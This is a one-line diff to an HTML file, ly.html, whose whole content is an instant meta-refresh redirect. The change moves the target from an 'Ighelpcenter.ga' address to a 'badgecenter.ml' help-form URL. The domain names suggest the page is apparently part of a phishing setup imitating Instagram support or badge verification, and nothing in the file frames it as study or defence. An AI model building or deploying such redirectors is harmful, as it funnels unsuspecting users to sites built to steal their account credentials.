--- a/ly.html
+++ b/ly.html
@@ -1,1 +1,1 @@
-<html><head><meta http-equiv="refresh" content="0;URL=http://Ighelpcenter.ga"></head></html>
+<html><head><meta http-equiv="refresh" content="0;URL=https://badgecenter.ml/Help/Form/1842953930227/"></head></html>
